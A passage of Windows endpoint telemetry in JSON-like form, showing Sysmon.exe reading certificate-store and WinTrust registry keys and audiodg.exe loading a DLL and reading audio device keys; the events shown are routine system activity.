131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976990000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AUDIOKSE.dll", - "image_path": "C:\\Windows\\System32\\AUDIOKSE.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - 
"registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": 
"C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573977140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 